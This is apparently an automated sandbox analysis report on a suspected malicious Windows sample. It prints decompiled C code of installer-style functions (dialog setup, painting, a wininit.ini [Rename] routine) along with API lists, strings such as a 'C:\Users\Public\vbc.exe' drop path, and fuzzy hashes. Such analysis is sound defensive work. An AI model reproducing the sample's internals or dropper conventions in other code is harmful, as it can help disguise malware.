								GetClassInfoA(0, "RichEdit", 0x423ee0);
								 *0x423f04 = _t81;
								RegisterClassA(0x423ee0);
							}
							_t36 =  *0x423f20; // 0x0
							_t39 = DialogBoxParamA( *0x424740, _t36 + 0x00000069 & 0x0000ffff, 0, E00403DD8, 0);
							E0040398B(E0040140B(5), 1);
							return _t39;
						}
						L22:
						_t31 = 2;
						return _t31;
					} else {
						_t71 =  *0x424740;
						 *0x423ee4 = E00401000;
						 *0x423ef0 =  *0x424740;
						 *0x423ef4 = _t25;
						 *0x423f04 = 0x40a210;
						if(RegisterClassA(0x423ee0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoA(0x30, 0,  &_v16, 0);
						 *0x420d30 = CreateWindowExA(0x80, 0x40a210, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x424740, 0);
						goto L21;
					}
				} else {
					_t71 =  *(_t76 + 0x48);
					_t86 = _t71;
					if(_t71 == 0) {
						goto L16;
					}
					_t74 = 0x4236e0;
					E0040610F(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x424798, 0x4236e0, 0);
					_t57 =  *0x4236e0; // 0x75
					if(_t57 == 0) {
						goto L16;
					}
					if(_t57 == 0x22) {
						_t74 = 0x4236e1;
						 *((char*)(E00405BEB(0x4236e1, 0x22))) = 0;
					}
					_t59 = lstrlenA(_t74) + _t74 - 4;
					if(_t59 <= _t74 || lstrcmpiA(_t59, ?str?) != 0) {
						L15:
						E00406228(_t80, E00405BC0(_t74));
						goto L16;
					} else {
						_t63 = GetFileAttributesA(_t74);
						if(_t63 == 0xffffffff) {
							L14:
							E00405C07(_t74);
							goto L15;
						}
						_t92 = _t63 & 0x00000010;
						if((_t63 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403a41
0x00403a4a
0x00403a51
0x00403a53
0x00403a67
0x00403a79
0x00403a80
0x00403a87
0x00403a8d
0x00403a92
0x00403a98
0x00403aab
0x00403aab
0x00403ab6
0x00403a55
0x00403a60
0x00403a60
0x00403abb
0x00403ac5
0x00403ace
0x00403ad3
0x00403ae4
0x00403b6b
0x00403b73
0x00403b7c
0x00403b7c
0x00403b92
0x00403b98
0x00403ba6
0x00403c27
0x00403c2f
0x00403c39
0x00403c3e
0x00403c44
0x00403cce
0x00403cd3
0x00403cd5
0x00403cf1
0x00000000
0x00403cf1
0x00403cd7
0x00403cdd
0x00403ce5
0x00403ce5
0x00000000
0x00403cdd
0x00403c52
0x00403c5d
0x00403c62
0x00403c64
0x00403c6b
0x00403c6b
0x00403c76
0x00403c7e
0x00403c80
0x00403c82
0x00403c8b
0x00403c8e
0x00403c94
0x00403c94
0x00403c9a
0x00403cb3
0x00403cc4
0x00000000
0x00403cc9
0x00403c31
0x00403c33
0x00000000
0x00403ba8
0x00403ba8
0x00403bb4
0x00403bbe
0x00403bc4
0x00403bc9
0x00403bd8
0x00403cf6
0x00403cf6
0x00000000
0x00403cf6
0x00403be7
0x00403c22
0x00000000
0x00403c22
0x00403aea
0x00403aea
0x00403aed
0x00403aef
0x00000000
0x00000000
0x00403af9
0x00403b09
0x00403b0e
0x00403b15
0x00000000
0x00000000
0x00403b19
0x00403b1b
0x00403b28
0x00403b28
0x00403b30
0x00403b36
0x00403b5e
0x00403b66
0x00000000
0x00403b48
0x00403b49
0x00403b52
0x00403b58
0x00403b59
0x00000000
0x00403b59
0x00403b54
0x00403b56
0x00000000
0x00000000
0x00000000
0x00403b56
0x00403b36

APIs

Part of subcall function 00406631: GetModuleHandleA.KERNEL32(?,?,?,004034D4,0000000B), ref: 00406643
Part of subcall function 00406631: GetProcAddress.KERNEL32(00000000,?,?,?,004034D4,0000000B), ref: 0040665E

lstrcatA.KERNEL32(1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,76712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\Public\vbc.exe" ,00000000), ref: 00403AB6
lstrlenA.KERNEL32(uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000,00000002,76712754), ref: 00403B2B
lstrcmpiA.KERNEL32(?,.exe,uvlcopdlxoed,?,?,?,uvlcopdlxoed,00000000,C:\Users\user\AppData\Local\Temp,1033,00420D50,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420D50,00000000), ref: 00403B3E
GetFileAttributesA.KERNEL32(uvlcopdlxoed), ref: 00403B49
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403B92

Part of subcall function 00406186: wsprintfA.USER32 ref: 00406193

RegisterClassA.USER32(00423EE0), ref: 00403BCF
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403BE7
CreateWindowExA.USER32 ref: 00403C1C
ShowWindow.USER32(00000005,00000000), ref: 00403C52
GetClassInfoA.USER32(00000000,RichEdit20A,00423EE0), ref: 00403C7E
GetClassInfoA.USER32(00000000,RichEdit,00423EE0), ref: 00403C8B
RegisterClassA.USER32(00423EE0), ref: 00403C94
DialogBoxParamA.USER32 ref: 00403CB3

Strings

"C:\Users\Public\vbc.exe" , xrefs: 00403A3F
Control Panel\Desktop\ResourceLocale, xrefs: 00403A6F
>B, xrefs: 00403BA1
1033, xrefs: 00403A5B, 00403AB1
uvlcopdlxoed, xrefs: 00403AF9, 00403B01, 00403B0E, 00403B58, 00403B5E
PB, xrefs: 00403A67
C:\Users\user\AppData\Local\Temp, xrefs: 00403AC5, 00403ACD, 00403B65, 00403B6B, 00403B7B
.DEFAULT\Control Panel\International, xrefs: 00403AA1
_Nb, xrefs: 00403BAE, 00403C16
RichEdit20A, xrefs: 00403C76, 00403C7C
.exe, xrefs: 00403B38
C:\Users\user\AppData\Local\Temp\, xrefs: 00403A40
RichEd20, xrefs: 00403C58
RichEd32, xrefs: 00403C66
RichEdit, xrefs: 00403C85

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\Public\vbc.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$PB$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$uvlcopdlxoed$>B
API String ID: 1975747703-2442209702
Opcode ID: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
Instruction ID: 0b0e7d8dfe967f47b98d7fa3c12120eb495d8fa8be153c65172cdb3e572a9271
Opcode Fuzzy Hash: 8cd03706bc3b4e3cd0d6d37f96b9a73a5a3b7a5ac7853bf60a8ad06bd9737550
Instruction Fuzzy Hash: A061C4702046046EE620AF65AD46F3B3A7CEB8574AF40443FF951B62D3CB7D99068A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00404417, Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404417(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				signed int _t106;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L11:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x41fd1c =  *0x41fd1c + 1;
								__eflags =  *0x41fd1c;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404313(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
								_t100 =  *((intOrPtr*)(_t110 + 0x1c));
								_t109 =  *((intOrPtr*)(_t110 + 0x18));
								_v12 = _t100;
								__eflags = _t100 - _t109 - 0x800;
								_v16 = _t109;
								_v8 = 0x4236e0;
								if(_t100 - _t109 < 0x800) {
									SendMessageA(_t52, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorA(0, 0x7f02));
									_push(1);
									_t40 =  &_v8; // 0x4236e0
									E004046BB(_a4,  *_t40);
									SetCursor(LoadCursorA(0, 0x7f00));
									_t110 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {
							goto L26;
						} else {
							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
								goto L26;
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x424748, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x424748, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L25;
					}
					__eflags =  *0x41fd1c; // 0x0
					if(__eflags != 0) {
						goto L25;
					}
					_t112 =  *0x420528 + 0x14;
					__eflags =  *_t112 & 0x00000020;
					if(( *_t112 & 0x00000020) == 0) {
						goto L25;
					}
					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t106;
					 *_t112 = _t106;
					E004042CE(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E00404697();
					goto L11;
				} else {
					_t98 = _a16;
					_t113 =  *(_t98 + 0x30);
					if(_t113 < 0) {
						_t107 =  *0x423f1c; // 0x5f57f6
						_t113 =  *(_t107 - 4 + _t113 * 4);
					}
					_push( *((intOrPtr*)(_t98 + 0x34)));
					_t114 = _t113 +  *0x424798;
					_push(0x22);
					_a16 =  *_t114;
					_v12 = _v12 & 0x00000000;
					_t115 = _t114 + 1;
					_v16 = _t115;
					_v8 = E004043E2;
					E004042AC(_a4);
					_push( *((intOrPtr*)(_t98 + 0x38)));
					_push(0x23);
					E004042AC(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E004042CE( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
					_t99 = GetDlgItem(_a4, 0x3e8);
					E004042E1(_t99);
					SendMessageA(_t99, 0x45b, 1, 0);
					_t86 =  *( *0x424754 + 0x68);
					if(_t86 < 0) {
						_t86 = GetSysColor( ~_t86);
					}
					SendMessageA(_t99, 0x443, 0, _t86);
					SendMessageA(_t99, 0x445, 0, 0x4010000);
					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
					 *0x41fd1c = 0;
					SendMessageA(_t99, 0x449, _a16,  &_v16);
					 *0x41fd1c = 0;
					return 0;
				}
			}

0x00404427
0x00404539
0x0040454c
0x004045a8
0x004045a8
0x004045ac
0x00404672
0x00404679
0x0040467b
0x0040467b
0x0040467b
0x00404681
0x00404681
0x00404684
0x00000000
0x0040468b
0x004045ba
0x004045bc
0x004045bf
0x004045c6
0x004045c8
0x004045cf
0x004045d1
0x004045d4
0x004045d7
0x004045dc
0x004045e2
0x004045e5
0x004045ec
0x004045fa
0x00404612
0x00404614
0x00404616
0x0040461c
0x0040462b
0x0040462d
0x0040462d
0x004045ec
0x004045cf
0x00404630
0x00404637
0x00000000
0x00404639
0x00404639
0x00404640
0x00000000
0x00000000
0x00404642
0x00404646
0x00404657
0x00404657
0x00404659
0x0040465d
0x0040466b
0x0040466b
0x00000000
0x0040466f
0x00404637
0x00404554
0x00404557
0x00000000
0x00000000
0x0040455f
0x00404565
0x00000000
0x00000000
0x00404571
0x00404574
0x00404577
0x00000000
0x00000000
0x0040459a
0x0040459a
0x0040459c
0x0040459e
0x004045a3
0x00000000
0x0040442d
0x0040442d
0x00404430
0x00404435
0x00404437
0x00404446
0x00404446
0x0040444d
0x00404450
0x00404452
0x00404457
0x00404460
0x00404466
0x00404472
0x00404475
0x0040447e
0x00404483
0x00404486
0x0040448b
0x004044a2
0x004044a9
0x004044bc
0x004044bf
0x004044d4
0x004044db
0x004044e0
0x004044e5
0x004044e5
0x004044f4
0x00404503
0x00404515
0x0040451a
0x0040452a
0x0040452c
0x00000000
0x00404532

APIs

CheckDlgButton.USER32 ref: 004044A2
GetDlgItem.USER32(00000000,000003E8), ref: 004044B6
SendMessageA.USER32 ref: 004044D4
GetSysColor.USER32 ref: 004044E5
SendMessageA.USER32 ref: 004044F4
SendMessageA.USER32 ref: 00404503
lstrlenA.KERNEL32(?), ref: 00404506
SendMessageA.USER32 ref: 00404515
SendMessageA.USER32 ref: 0040452A
GetDlgItem.USER32(?,0000040A), ref: 0040458C
SendMessageA.USER32 ref: 0040458F
GetDlgItem.USER32(?,000003E8), ref: 004045BA
SendMessageA.USER32 ref: 004045FA
LoadCursorA.USER32 ref: 00404609
SetCursor.USER32(00000000), ref: 00404612
LoadCursorA.USER32 ref: 00404628
SetCursor.USER32(00000000), ref: 0040462B
SendMessageA.USER32 ref: 00404657
SendMessageA.USER32 ref: 0040466B

Strings

6B, xrefs: 00404616
N, xrefs: 004045A8

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N$6B
API String ID: 3103080414-649610290
Opcode ID: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
Instruction ID: 4db3d1b8578fb28e8129a2e139a0a5bbbdeef9899b51b491bef805f45c6f40d7
Opcode Fuzzy Hash: 92e91cd1affbd3efd92fc6b3bb7834c3f505693ecc67e2e18e8bcfcef82aadde
Instruction Fuzzy Hash: 5761B2B1A00209BFDB109F61DD45F6A3B69EB85310F11843AFB01BA2D1D7BD9952CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00405E97, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 129
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E97(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				CHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x422ae0 = 0x4c554e;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x422ee0
					_t12 = GetShortPathNameA( *_t2, 0x422ee0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4226e0, "%s=%s\r\n", 0x422ae0, 0x422ee0);
						_t53 = _t52 + 0x10;
						E004062BB(_t37, 0x400, 0x422ee0, 0x422ee0,  *((intOrPtr*)( *0x424754 + 0x128)));
						_t12 = E00405DC1(0x422ee0, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405E39(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405D26(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405D26(_t38, _t21 + 0xa, 0x40a3f0);
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D7C(_t24 + _t46, 0x4226e0, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E68(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405DC1(_t44, 0, 1));
					_t12 = GetShortPathNameA(_t44, 0x422ae0, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405e97
0x00405ea0
0x00405ea7
0x00405ebb
0x00405ee3
0x00405eea
0x00405eee
0x00405ef2
0x00405f12
0x00405f19
0x00405f23
0x00405f30
0x00405f35
0x00405f3a
0x00405f3e
0x00405f4d
0x00405f4f
0x00405f5c
0x00405f60
0x00405ffb
0x00000000
0x00405f76
0x00405f83
0x00405fa7
0x00405fab
0x00405fca
0x00405fce
0x00405fce
0x00405fd0
0x00405fd9
0x00405fe4
0x00405fef
0x00405ff5
0x00000000
0x00405ff5
0x00405fad
0x00405fb0
0x00405fbb
0x00405fb7
0x00405fb9
0x00405fba
0x00405fba
0x00405fc2
0x00405fc4
0x00000000
0x00405fc4
0x00405f8e
0x00405f94
0x00000000
0x00405f94
0x00405f60
0x00405f3e
0x00405ebd
0x00405ec8
0x00405ed1
0x00405ed5
0x00000000
0x00000000
0x00405ed5
0x00406006

APIs

CloseHandle.KERNEL32(00000000), ref: 00405EC8
GetShortPathNameA.KERNEL32 ref: 00405ED1

Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D36
Part of subcall function 00405D26: lstrlenA.KERNEL32(00000000,?,00000000,00405F81,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D68

GetShortPathNameA.KERNEL32 ref: 00405EEE
wsprintfA.USER32 ref: 00405F0C
GetFileSize.KERNEL32(00000000,00000000,00422EE0,C0000000,00000004,00422EE0,?,?,?,?,?), ref: 00405F47
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F56
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F8E
SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,004226E0,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00405FE4
GlobalFree.KERNEL32(00000000), ref: 00405FF5
CloseHandle.KERNEL32(00000000), ref: 00405FFC

Part of subcall function 00405DC1: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405DC5
Part of subcall function 00405DC1: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7

Strings

.B, xrefs: 00405EEA
*B, xrefs: 00405EB6
[Rename], xrefs: 00405F76, 00405F88
.B, xrefs: 00405EE3
%s=%s, xrefs: 00405F02

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]$*B$.B$.B
API String ID: 2171350718-3836630945
Opcode ID: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
Instruction ID: e10df20c38e6db669e3e204b33f1f32e55eddbf12f2a20f16207bac721f49ac6
Opcode Fuzzy Hash: e97eba996e681404a4fca208a0394d40b36fb18a7df9535e4eb70ec6e63efc10
Instruction Fuzzy Hash: EA310331200B167BD2206B659E4DF6B3A5CDF45758F14043BF942F62D2EE7CE8118AAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x424754;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x423f40, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x424748;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00423F40,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
Instruction ID: db002e3ba225c6bd58a8671fff368fb1669b339ad4166f4ebb51648b269c9ea2
Opcode Fuzzy Hash: 2115552123f79a9609963f7e9290141a6f0abd4dc8a6adc5f5d249a59f4964a3
Instruction Fuzzy Hash: 51419D71800249AFCF058FA5DE459AF7FB9FF45314F00802AF991AA1A0C738DA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 004062BB, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004062BB(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				struct _ITEMIDLIST* _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t38;
				CHAR* _t39;
				signed int _t41;
				char _t52;
				char _t53;
				char _t55;
				char _t57;
				void* _t65;
				char* _t66;
				signed int _t80;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				CHAR* _t90;
				void* _t92;
				signed int _t97;
				signed int _t99;
				void* _t100;

				_t92 = __esi;
				_t89 = __edi;
				_t65 = __ebx;
				_t38 = _a8;
				if(_t38 < 0) {
					_t86 =  *0x423f1c; // 0x5f57f6
					_t38 =  *(_t86 - 4 + _t38 * 4);
				}
				_push(_t65);
				_push(_t92);
				_push(_t89);
				_t66 = _t38 +  *0x424798;
				_t39 = 0x4236e0;
				_t90 = 0x4236e0;
				if(_a4 >= 0x4236e0 && _a4 - 0x4236e0 < 0x800) {
					_t90 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t88 =  *_t66;
					if(_t88 == 0) {
						break;
					}
					__eflags = _t90 - _t39 - 0x400;
					if(_t90 - _t39 >= 0x400) {
						break;
					}
					_t66 = _t66 + 1;
					__eflags = _t88 - 4;
					_a8 = _t66;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t90 = _t88;
							_t90 =  &(_t90[1]);
							__eflags = _t90;
						} else {
							 *_t90 =  *_t66;
							_t90 =  &(_t90[1]);
							_t66 = _t66 + 1;
						}
						continue;
					}
					_t41 =  *((char*)(_t66 + 1));
					_t80 =  *_t66;
					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062BB(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x4236e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
